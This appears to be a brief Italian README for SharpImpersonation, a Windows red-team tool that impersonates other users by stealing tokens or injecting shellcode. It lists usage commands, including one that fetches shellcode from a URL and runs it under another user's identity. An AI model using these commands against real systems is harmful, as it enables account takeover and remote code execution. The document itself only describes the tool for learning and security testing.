
Uno strumento di impersonificazione utente - tramite Token o iniezione di Shellcode
Questo è stato un progetto di apprendimento pratico da parte mia. Vengono utilizzate tecniche ben note per costruire semplicemente un altro strumento di impersonificazione con alcuni miglioramenti rispetto ad altri strumenti pubblici. Il codice base è stato preso da:
Un post sul blog per l'introduzione può essere trovato qui:
PS > PS C:\temp> SharpImpersonation.exe list
PS > PS C:\temp> SharpImpersonation.exe list elevated
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
